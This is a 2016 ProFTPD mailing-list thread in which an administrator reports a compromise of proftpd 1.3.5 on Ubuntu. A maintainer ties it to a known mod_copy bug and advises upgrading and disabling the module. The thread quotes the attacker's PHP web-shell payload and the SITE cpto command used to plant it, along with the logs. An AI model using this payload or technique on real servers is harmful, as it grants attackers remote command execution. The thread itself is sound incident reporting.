Discussion:
[Proftpd-user] proftpd 1.3.5 vulnerable?
Tomasz Chmielewski
2016-04-07 15:54:21 UTC
Permalink
Running proftpd on Ubuntu 14.04.4 LTS with the latest updates installed
as of today.

proftpd-basic 1.3.5~rc3-2.1ubuntu2
amd64


Found a weird file:

# ls -la /tmp|grep eval
-rw-r--r-- 1 proftpd nogroup 85 Apr 7 14:21 .<?php
eval($_REQUEST[cmd]); echo GOOD;?>

# cat /tmp/.*eval*
proftpd: 80.110.39.36:56405: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]);
echo GOOD;?>


There are no anonymous users, there is no trace in the logs about any
valid user logging in around 14:21, Apr 7.

Except these:

2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): FTP session opened.
2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/html/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,428 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/html/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:53,820 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/html/img/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,302 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/www/image/infos.php' for copying: No such file or directory
2016-04-07 14:19:54,882 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/www/images/infos.php' for copying: No such file or directory
2016-04-07 14:19:55,403 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/www/img/infos.php' for copying: No such file or directory
(...)
2016-04-07 14:21:59,207 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): FTP session closed.


And the list goes on. It only logs about the files it didn't find; it
doesn't log about the files it did found or uploaded - apparently the
attacker had access to the whole server as "proftpd" user.


Is it a known problem? For now, switched off proftpd.


Tomasz Chmielewski
http://wpkg.org
TJ Saunders
2016-04-07 16:17:49 UTC
Permalink
Post by Tomasz Chmielewski
Running proftpd on Ubuntu 14.04.4 LTS with the latest updates installed
as of today.
proftpd-basic 1.3.5~rc3-2.1ubuntu2
amd64
# ls -la /tmp|grep eval
-rw-r--r-- 1 proftpd nogroup 85 Apr 7 14:21 .<?php
eval($_REQUEST[cmd]); echo GOOD;?>
# cat /tmp/.*eval*
proftpd: 80.110.39.36:56405: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]);
echo GOOD;?>
There are no anonymous users, there is no trace in the logs about any
valid user logging in around 14:21, Apr 7.
2016-04-07 14:19:52,570 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): FTP session opened.
2016-04-07 14:19:52,997 server proftpd[7263] 10.11.12.13
(80.110.39.36[80.110.39.36]): error opening destination file
'/var/html/image/infos.php' for copying: No such file or directory
This sounds suspicously like:

http://bugs.proftpd.org/show_bug.cgi?id=4169

If you can, I'd recommend upgrading to a later version of proftpd
(1.3.5-stable or later), and disabling/removing/not loading the mod_copy
module.

TJ
Tomasz Chmielewski
2016-04-07 16:20:42 UTC
Permalink
Post by TJ Saunders
http://bugs.proftpd.org/show_bug.cgi?id=4169
If you can, I'd recommend upgrading to a later version of proftpd
(1.3.5-stable or later), and disabling/removing/not loading the mod_copy
module.
Indeed.

Nobody in Ubuntu cared to update it for so long!

https://bugs.launchpad.net/ubuntu/%2Bsource/proftpd-dfsg/%2Bbug/1462311


Tomasz Chmielewski
http://wpkg.org

Loading...